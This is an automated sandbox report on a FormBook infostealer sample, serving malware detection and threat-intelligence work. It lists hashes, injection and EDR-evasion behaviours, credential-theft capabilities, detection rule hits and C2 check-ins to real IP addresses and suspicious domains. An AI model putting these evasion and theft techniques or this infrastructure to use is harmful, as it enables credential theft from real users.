Edit tour

Windows Analysis Report
XeFYBYYj0w.exe

Overview

General Information

Sample name:	XeFYBYYj0w.exe renamed because original name is a hash value
Original sample name:	2e2cbed55b8cf302b251ba867b7d438e286ae823dd9cda646f4996bc07c4e896.exe
Analysis ID:	1588389
MD5:	ecb2719218ea0ad21c7d72a976cf69d2
SHA1:	91cfa0b33196cab05aa7c4bb5668c2dab332b62f
SHA256:	2e2cbed55b8cf302b251ba867b7d438e286ae823dd9cda646f4996bc07c4e896
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

XeFYBYYj0w.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\XeFYBYYj0w.exe" MD5: ECB2719218EA0AD21C7D72A976CF69D2)

svchost.exe (PID: 5520 cmdline: "C:\Users\user\Desktop\XeFYBYYj0w.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

fIydfvfomIEE.exe (PID: 4428 cmdline: "C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

relog.exe (PID: 1920 cmdline: "C:\Windows\SysWOW64\relog.exe" MD5: DA20D543A130003B427AEB18AE2FE094)

fIydfvfomIEE.exe (PID: 1228 cmdline: "C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2384 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3149335657.00000000058F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3145337873.0000000002770000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3145033893.0000000000490000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3145403787.00000000027C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1640145384.0000000003650000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1639166335.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1640191326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3146582486.0000000002E90000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\XeFYBYYj0w.exe", CommandLine: "C:\Users\user\Desktop\XeFYBYYj0w.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\XeFYBYYj0w.exe", ParentImage: C:\Users\user\Desktop\XeFYBYYj0w.exe, ParentProcessId: 6220, ParentProcessName: XeFYBYYj0w.exe, ProcessCommandLine: "C:\Users\user\Desktop\XeFYBYYj0w.exe", ProcessId: 5520, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\XeFYBYYj0w.exe", CommandLine: "C:\Users\user\Desktop\XeFYBYYj0w.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\XeFYBYYj0w.exe", ParentImage: C:\Users\user\Desktop\XeFYBYYj0w.exe, ParentProcessId: 6220, ParentProcessName: XeFYBYYj0w.exe, ProcessCommandLine: "C:\Users\user\Desktop\XeFYBYYj0w.exe", ProcessId: 5520, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:54:51.949675+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49949	47.83.1.90	80	TCP
2025-01-11T01:55:16.269329+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49972	47.83.1.90	80	TCP
2025-01-11T01:55:29.767492+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T01:55:43.316764+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T01:55:56.669314+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T01:56:11.324500+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T01:56:25.422276+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49993	188.114.96.3	80	TCP
2025-01-11T01:56:47.343332+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T01:57:01.108849+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.7	50001	162.218.30.235	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:54:51.949675+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49949	47.83.1.90	80	TCP
2025-01-11T01:55:16.269329+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49972	47.83.1.90	80	TCP
2025-01-11T01:55:29.767492+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49977	185.151.30.223	80	TCP
2025-01-11T01:55:43.316764+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49981	176.57.65.76	80	TCP
2025-01-11T01:55:56.669314+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49985	209.74.79.41	80	TCP
2025-01-11T01:56:11.324500+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49989	46.38.243.234	80	TCP
2025-01-11T01:56:25.422276+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49993	188.114.96.3	80	TCP
2025-01-11T01:56:47.343332+0100	2855465	1	A Network Trojan was detected	192.168.2.7	49997	18.163.74.139	80	TCP
2025-01-11T01:57:01.108849+0100	2855465	1	A Network Trojan was detected	192.168.2.7	50001	162.218.30.235	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T01:55:08.547642+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49969	47.83.1.90	80	TCP
2025-01-11T01:55:11.094478+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49970	47.83.1.90	80	TCP
2025-01-11T01:55:13.641316+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49971	47.83.1.90	80	TCP
2025-01-11T01:55:22.122213+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49974	185.151.30.223	80	TCP
2025-01-11T01:55:24.608012+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49975	185.151.30.223	80	TCP
2025-01-11T01:55:27.240322+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49976	185.151.30.223	80	TCP
2025-01-11T01:55:35.612443+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49978	176.57.65.76	80	TCP
2025-01-11T01:55:38.274542+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49979	176.57.65.76	80	TCP
2025-01-11T01:55:40.926704+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49980	176.57.65.76	80	TCP
2025-01-11T01:55:49.013160+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49982	209.74.79.41	80	TCP
2025-01-11T01:55:51.565930+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49983	209.74.79.41	80	TCP
2025-01-11T01:55:54.123823+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49984	209.74.79.41	80	TCP
2025-01-11T01:56:03.250833+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49986	46.38.243.234	80	TCP
2025-01-11T01:56:05.799417+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49987	46.38.243.234	80	TCP
2025-01-11T01:56:08.360221+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49988	46.38.243.234	80	TCP
2025-01-11T01:56:17.569102+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49990	188.114.96.3	80	TCP
2025-01-11T01:56:20.085731+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49991	188.114.96.3	80	TCP
2025-01-11T01:56:22.805907+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49992	188.114.96.3	80	TCP
2025-01-11T01:56:39.580906+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49994	18.163.74.139	80	TCP
2025-01-11T01:56:42.253554+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49995	18.163.74.139	80	TCP
2025-01-11T01:56:44.783542+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49996	18.163.74.139	80	TCP
2025-01-11T01:56:53.446861+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49998	162.218.30.235	80	TCP
2025-01-11T01:56:56.038707+0100	2855464	1	A Network Trojan was detected	192.168.2.7	49999	162.218.30.235	80	TCP
2025-01-11T01:56:58.591231+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50000	162.218.30.235	80	TCP
2025-01-11T01:57:07.417850+0100	2855464	1	A Network Trojan was detected	192.168.2.7	50002	192.186.58.31	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: XeFYBYYj0w.exe	Virustotal: Detection: 65%			Perma Link
Source: XeFYBYYj0w.exe	ReversingLabs: Detection: 76%

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3149335657.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145337873.0000000002770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145033893.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3145403787.00000000027C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640145384.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1639166335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1640191326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3146582486.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: XeFYBYYj0w.exe

Joe Sandbox ML: detected

Source: XeFYBYYj0w.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: relog.pdbGCTL source: svchost.exe, 00000003.00000003.1606578392.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1606526626.0000000002C13000.00000004.00000020.00020000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000003.1830165440.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: svchost.exe, 00000003.00000003.1606578392.0000000002C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1606526626.0000000002C13000.00000004.00000020.00020000.00000000.sdmp, fIydfvfomIEE.exe, 00000005.00000003.1830165440.00000000012BB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fIydfvfomIEE.exe, 00000005.00000000.1563585408.000000000056E000.00000002.00000001.01000000.00000005.sdmp, fIydfvfomIEE.exe, 00000007.00000002.3145062367.000000000056E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: XeFYBYYj0w.exe, 00000000.00000003.1331043046.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, XeFYBYYj0w.exe, 00000000.00000003.1331319141.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1549241251.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1551043367.0000000003100000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1641805167.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1639382419.0000000002978000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: XeFYBYYj0w.exe, 00000000.00000003.1331043046.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, XeFYBYYj0w.exe, 00000000.00000003.1331319141.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.1549241251.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1639720900.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1551043367.0000000003100000.00000004.00000020.00020000.00000000.sdmp, relog.exe, relog.exe, 00000006.00000003.1641805167.0000000002B20000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1639382419.0000000002978000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3146904584.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: relog.exe, 00000006.00000002.3145583300.0000000002881000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3147754299.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710941442.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1937368807.000000002ED0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: relog.exe, 00000006.00000002.3145583300.0000000002881000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3147754299.00000000032FC000.00000004.10000000.00040000.00000000.sdmp, fIydfvfomIEE.exe, 00000007.00000000.1710941442.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.1937368807.000000002ED0C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00A7445A
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7C6D1 FindFirstFileW,FindClose,	0_2_00A7C6D1
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00A7C75C
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A7EF95
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00A7F0F2
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A7F3F3
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A737EF
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00A73B12
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00A7BCBC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004AC330 FindFirstFileW,FindNextFileW,FindClose,	6_2_004AC330

Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then xor eax, eax	6_2_00499E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	6_2_004A5659
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_02B204E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49975 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49974 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49981 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49981 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49972 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49972 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49976 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49970 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49949 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49949 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49969 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49977 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49977 -> 185.151.30.223:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49985 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49985 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49993 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49993 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49997 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49997 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 192.186.58.31:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 176.57.65.76:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49971 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 18.163.74.139:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50001 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50001 -> 162.218.30.235:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 209.74.79.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49989 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 46.38.243.234:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.thinkone.xyz
Source:	DNS query: www.l03678.xyz

Source: Joe Sandbox View

IP Address: 47.83.1.90 47.83.1.90

Source: Joe Sandbox View	ASN Name: TELINEABA TELINEABA
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VODANETInternationalIP-BackboneofVodafoneDE VODANETInternationalIP-BackboneofVodafoneDE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
